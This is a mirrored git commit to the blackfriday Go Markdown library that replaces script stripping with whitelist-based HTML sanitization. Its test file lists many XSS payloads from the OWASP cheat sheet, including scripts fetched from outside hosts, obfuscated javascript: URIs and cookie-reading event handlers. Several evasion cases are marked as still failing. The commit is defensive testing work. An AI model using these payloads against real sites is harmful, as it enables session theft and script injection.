mirror of
https://github.com/danog/blackfriday.git
synced 2024-11-26 20:14:43 +01:00
Rewrite protection against JavaScript injection
This drops the naive approach at <script> tag stripping and resorts to full sanitization of html. The general idea (and the regexps) is grabbed from Stack Exchange's PageDown JavaScript Markdown processor[1]. Like in PageDown, it's implemented as a separate pass over resulting html. Includes a metric ton (but not all) of test cases from here[2]. Several are commented out since they don't pass yet. Stronger (but still incomplete) fix for #11. [1] http://code.google.com/p/pagedown/wiki/PageDown [2] https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
This commit is contained in:
parent
e02c392dc6
commit
55cd82008e
102
html.go
102
html.go
@ -18,6 +18,7 @@ package blackfriday
|
|||||||
import (
|
import (
|
||||||
"bytes"
|
"bytes"
|
||||||
"fmt"
|
"fmt"
|
||||||
|
"regexp"
|
||||||
"strconv"
|
"strconv"
|
||||||
"strings"
|
"strings"
|
||||||
)
|
)
|
||||||
@ -40,6 +41,41 @@ const (
|
|||||||
HTML_SMARTYPANTS_LATEX_DASHES // enable LaTeX-style dashes (with HTML_USE_SMARTYPANTS)
|
HTML_SMARTYPANTS_LATEX_DASHES // enable LaTeX-style dashes (with HTML_USE_SMARTYPANTS)
|
||||||
)
|
)
|
||||||
|
|
||||||
|
var (
|
||||||
|
tags = []string{
|
||||||
|
"b",
|
||||||
|
"blockquote",
|
||||||
|
"code",
|
||||||
|
"del",
|
||||||
|
"dd",
|
||||||
|
"dl",
|
||||||
|
"dt",
|
||||||
|
"em",
|
||||||
|
"h1",
|
||||||
|
"h2",
|
||||||
|
"h3",
|
||||||
|
"h4",
|
||||||
|
"h5",
|
||||||
|
"h6",
|
||||||
|
"i",
|
||||||
|
"kbd",
|
||||||
|
"li",
|
||||||
|
"ol",
|
||||||
|
"p",
|
||||||
|
"pre",
|
||||||
|
"s",
|
||||||
|
"sup",
|
||||||
|
"sub",
|
||||||
|
"strong",
|
||||||
|
"strike",
|
||||||
|
"ul",
|
||||||
|
}
|
||||||
|
urlRe = `((https?|ftp):\/\/|\/)[-A-Za-z0-9+&@#\/%?=~_|!:,.;\(\)]+`
|
||||||
|
tagWhitelist = regexp.MustCompile(`^(<\/?(` + strings.Join(tags, "|") + `)>|<(br|hr)\s?\/?>)$`)
|
||||||
|
anchorClean = regexp.MustCompile(`^(<a\shref="` + urlRe + `"(\stitle="[^"<>]+")?\s?>|<\/a>)$`)
|
||||||
|
imgClean = regexp.MustCompile(`^(<img\ssrc="` + urlRe + `"(\swidth="\d{1,3}")?(\sheight="\d{1,3}")?(\salt="[^"<>]*")?(\stitle="[^"<>]*")?\s?\/?>)$`)
|
||||||
|
)
|
||||||
|
|
||||||
// Html is a type that implements the Renderer interface for HTML output.
|
// Html is a type that implements the Renderer interface for HTML output.
|
||||||
//
|
//
|
||||||
// Do not create this directly, instead use the HtmlRenderer function.
|
// Do not create this directly, instead use the HtmlRenderer function.
|
||||||
@ -137,6 +173,10 @@ func attrEscape(out *bytes.Buffer, src []byte) {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
func (options *Html) GetFlags() int {
|
||||||
|
return options.flags
|
||||||
|
}
|
||||||
|
|
||||||
func (options *Html) Header(out *bytes.Buffer, text func() bool, level int) {
|
func (options *Html) Header(out *bytes.Buffer, text func() bool, level int) {
|
||||||
marker := out.Len()
|
marker := out.Len()
|
||||||
doubleSpace(out)
|
doubleSpace(out)
|
||||||
@ -168,32 +208,10 @@ func (options *Html) BlockHtml(out *bytes.Buffer, text []byte) {
|
|||||||
}
|
}
|
||||||
|
|
||||||
doubleSpace(out)
|
doubleSpace(out)
|
||||||
if options.flags&HTML_SKIP_SCRIPT != 0 {
|
|
||||||
out.Write(stripTag(string(text), "script", "p"))
|
|
||||||
} else {
|
|
||||||
out.Write(text)
|
out.Write(text)
|
||||||
}
|
|
||||||
out.WriteByte('\n')
|
out.WriteByte('\n')
|
||||||
}
|
}
|
||||||
|
|
||||||
func stripTag(text, tag, newTag string) []byte {
|
|
||||||
closeNewTag := fmt.Sprintf("</%s>", newTag)
|
|
||||||
i := 0
|
|
||||||
for i < len(text) && text[i] != '<' {
|
|
||||||
i++
|
|
||||||
}
|
|
||||||
if i == len(text) {
|
|
||||||
return []byte(text)
|
|
||||||
}
|
|
||||||
found, end := findHtmlTagPos([]byte(text[i:]), tag)
|
|
||||||
closeTag := fmt.Sprintf("</%s>", tag)
|
|
||||||
noOpen := text
|
|
||||||
if found {
|
|
||||||
noOpen = text[0:i+1] + newTag + text[end:]
|
|
||||||
}
|
|
||||||
return []byte(strings.Replace(noOpen, closeTag, closeNewTag, -1))
|
|
||||||
}
|
|
||||||
|
|
||||||
func (options *Html) HRule(out *bytes.Buffer) {
|
func (options *Html) HRule(out *bytes.Buffer) {
|
||||||
doubleSpace(out)
|
doubleSpace(out)
|
||||||
out.WriteString("<hr")
|
out.WriteString("<hr")
|
||||||
@ -781,6 +799,46 @@ func findHtmlTagPos(tag []byte, tagname string) (bool, int) {
|
|||||||
return false, -1
|
return false, -1
|
||||||
}
|
}
|
||||||
|
|
||||||
|
func sanitizeHtml(html []byte) []byte {
|
||||||
|
var result []byte
|
||||||
|
for string(html) != "" {
|
||||||
|
skip, tag, rest := findHtmlTag(html)
|
||||||
|
html = rest
|
||||||
|
result = append(result, skip...)
|
||||||
|
result = append(result, sanitizeTag(tag)...)
|
||||||
|
}
|
||||||
|
return append(result, []byte("\n")...)
|
||||||
|
}
|
||||||
|
|
||||||
|
func sanitizeTag(tag []byte) []byte {
|
||||||
|
if tagWhitelist.Match(tag) || anchorClean.Match(tag) || imgClean.Match(tag) {
|
||||||
|
return tag
|
||||||
|
} else {
|
||||||
|
return []byte("")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func skipUntilChar(text []byte, start int, char byte) int {
|
||||||
|
i := start
|
||||||
|
for i < len(text) && text[i] != char {
|
||||||
|
i++
|
||||||
|
}
|
||||||
|
return i
|
||||||
|
}
|
||||||
|
|
||||||
|
func findHtmlTag(html []byte) (skip, tag, rest []byte) {
|
||||||
|
start := skipUntilChar(html, 0, '<')
|
||||||
|
rightAngle := skipUntilCharIgnoreQuotes(html, start, '>')
|
||||||
|
if rightAngle > start {
|
||||||
|
skip = html[0:start]
|
||||||
|
tag = html[start : rightAngle+1]
|
||||||
|
rest = html[rightAngle+1:]
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
return []byte(""), []byte(""), []byte("")
|
||||||
|
}
|
||||||
|
|
||||||
func skipSpace(tag []byte, i int) int {
|
func skipSpace(tag []byte, i int) int {
|
||||||
for i < len(tag) && isspace(tag[i]) {
|
for i < len(tag) && isspace(tag[i]) {
|
||||||
i++
|
i++
|
||||||
|
105
inline_test.go
105
inline_test.go
@ -90,16 +90,117 @@ func TestRawHtmlTag(t *testing.T) {
|
|||||||
"<p>alert()</p>\n",
|
"<p>alert()</p>\n",
|
||||||
|
|
||||||
"<script>alert()</script>\n",
|
"<script>alert()</script>\n",
|
||||||
"<p>alert()</p>\n",
|
"alert()\n",
|
||||||
|
|
||||||
"<script src='foo'></script>\n",
|
"<script src='foo'></script>\n",
|
||||||
"<p></p>\n",
|
"\n",
|
||||||
|
|
||||||
|
"<script src='a>b'></script>\n",
|
||||||
|
"\n",
|
||||||
|
|
||||||
"zz <script src='foo'></script>\n",
|
"zz <script src='foo'></script>\n",
|
||||||
"<p>zz </p>\n",
|
"<p>zz </p>\n",
|
||||||
|
|
||||||
"zz <script src=foo></script>\n",
|
"zz <script src=foo></script>\n",
|
||||||
"<p>zz </p>\n",
|
"<p>zz </p>\n",
|
||||||
|
|
||||||
|
`<script><script src="http://example.com/exploit.js"></SCRIPT></script>`,
|
||||||
|
"\n",
|
||||||
|
|
||||||
|
`'';!--"<XSS>=&{()}`,
|
||||||
|
"<p>'';!--"=&{()}</p>\n",
|
||||||
|
|
||||||
|
"<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>",
|
||||||
|
"<p></p>\n",
|
||||||
|
|
||||||
|
"<SCRIPT \nSRC=http://ha.ckers.org/xss.js></SCRIPT>",
|
||||||
|
"<p></p>\n",
|
||||||
|
|
||||||
|
`<IMG SRC="javascript:alert('XSS');">`,
|
||||||
|
"<p></p>\n",
|
||||||
|
|
||||||
|
"<IMG SRC=javascript:alert('XSS')>",
|
||||||
|
"<p></p>\n",
|
||||||
|
|
||||||
|
"<IMG SRC=JaVaScRiPt:alert('XSS')>",
|
||||||
|
"<p></p>\n",
|
||||||
|
|
||||||
|
"<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>",
|
||||||
|
"<p></p>\n",
|
||||||
|
|
||||||
|
`<a onmouseover="alert(document.cookie)">xss link</a>`,
|
||||||
|
"<p>xss link</a></p>\n",
|
||||||
|
|
||||||
|
"<a onmouseover=alert(document.cookie)>xss link</a>",
|
||||||
|
"<p>xss link</a></p>\n",
|
||||||
|
|
||||||
|
// XXX: this doesn't pass yet
|
||||||
|
//`<IMG """><SCRIPT>alert("XSS")</SCRIPT>">`,
|
||||||
|
//"<p></p>\n",
|
||||||
|
|
||||||
|
"<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
|
||||||
|
"<p></p>\n",
|
||||||
|
|
||||||
|
`<IMG SRC=# onmouseover="alert('xxs')">`,
|
||||||
|
"<p></p>\n",
|
||||||
|
|
||||||
|
`<IMG SRC= onmouseover="alert('xxs')">`,
|
||||||
|
"<p></p>\n",
|
||||||
|
|
||||||
|
`<IMG onmouseover="alert('xxs')">`,
|
||||||
|
"<p></p>\n",
|
||||||
|
|
||||||
|
"<IMG SRC=javascript:alert('XSS')>",
|
||||||
|
"<p></p>\n",
|
||||||
|
|
||||||
|
"<IMG SRC=javascript:alert('XSS')>",
|
||||||
|
"<p></p>\n",
|
||||||
|
|
||||||
|
"<IMG SRC=javascript:alert('XSS')>",
|
||||||
|
"<p></p>\n",
|
||||||
|
|
||||||
|
`<IMG SRC="javascriptascript:alert('XSS');">`,
|
||||||
|
"<p></p>\n",
|
||||||
|
|
||||||
|
`<IMG SRC="jav	ascript:alert('XSS');">`,
|
||||||
|
"<p></p>\n",
|
||||||
|
|
||||||
|
`<IMG SRC="jav
ascript:alert('XSS');">`,
|
||||||
|
"<p></p>\n",
|
||||||
|
|
||||||
|
`<IMG SRC="jav
ascript:alert('XSS');">`,
|
||||||
|
"<p></p>\n",
|
||||||
|
|
||||||
|
`<IMG SRC="  javascript:alert('XSS');">`,
|
||||||
|
"<p></p>\n",
|
||||||
|
|
||||||
|
`<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>`,
|
||||||
|
"<p></p>\n",
|
||||||
|
|
||||||
|
// XXX: this doesn't pass yet
|
||||||
|
//"<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>",
|
||||||
|
//"\n",
|
||||||
|
|
||||||
|
`<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>`,
|
||||||
|
"<p></p>\n",
|
||||||
|
|
||||||
|
// XXX: this doesn't pass yet
|
||||||
|
//`<<SCRIPT>alert("XSS");//<</SCRIPT>`,
|
||||||
|
//"",
|
||||||
|
|
||||||
|
"<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >",
|
||||||
|
"<p></p>\n",
|
||||||
|
|
||||||
|
"<SCRIPT SRC=//ha.ckers.org/.j>",
|
||||||
|
"<p></p>\n",
|
||||||
|
|
||||||
|
// XXX: this doesn't pass yet
|
||||||
|
//`<IMG SRC="javascript:alert('XSS')"`,
|
||||||
|
//"",
|
||||||
|
|
||||||
|
// XXX: this doesn't pass yet
|
||||||
|
//"<iframe src=http://ha.ckers.org/scriptlet.html <",
|
||||||
|
//"",
|
||||||
}
|
}
|
||||||
doTestsInlineParam(t, tests, 0, HTML_SKIP_STYLE|HTML_SKIP_SCRIPT)
|
doTestsInlineParam(t, tests, 0, HTML_SKIP_STYLE|HTML_SKIP_SCRIPT)
|
||||||
}
|
}
|
||||||
|
4
latex.go
4
latex.go
@ -34,6 +34,10 @@ func LatexRenderer(flags int) Renderer {
|
|||||||
return &Latex{}
|
return &Latex{}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
func (options *Latex) GetFlags() int {
|
||||||
|
return 0
|
||||||
|
}
|
||||||
|
|
||||||
// render code chunks using verbatim, or listings if we have a language
|
// render code chunks using verbatim, or listings if we have a language
|
||||||
func (options *Latex) BlockCode(out *bytes.Buffer, text []byte, lang string) {
|
func (options *Latex) BlockCode(out *bytes.Buffer, text []byte, lang string) {
|
||||||
if lang == "" {
|
if lang == "" {
|
||||||
|
@ -165,6 +165,8 @@ type Renderer interface {
|
|||||||
// Header and footer
|
// Header and footer
|
||||||
DocumentHeader(out *bytes.Buffer)
|
DocumentHeader(out *bytes.Buffer)
|
||||||
DocumentFooter(out *bytes.Buffer)
|
DocumentFooter(out *bytes.Buffer)
|
||||||
|
|
||||||
|
GetFlags() int
|
||||||
}
|
}
|
||||||
|
|
||||||
// Callback functions for inline parsing. One such function is defined
|
// Callback functions for inline parsing. One such function is defined
|
||||||
@ -291,6 +293,10 @@ func Markdown(input []byte, renderer Renderer, extensions int) []byte {
|
|||||||
first := firstPass(p, input)
|
first := firstPass(p, input)
|
||||||
second := secondPass(p, first)
|
second := secondPass(p, first)
|
||||||
|
|
||||||
|
if renderer.GetFlags()&HTML_SKIP_SCRIPT != 0 {
|
||||||
|
second = sanitizeHtml(second)
|
||||||
|
}
|
||||||
|
|
||||||
return second
|
return second
|
||||||
}
|
}
|
||||||
|
|
||||||
|
Loading…
Reference in New Issue
Block a user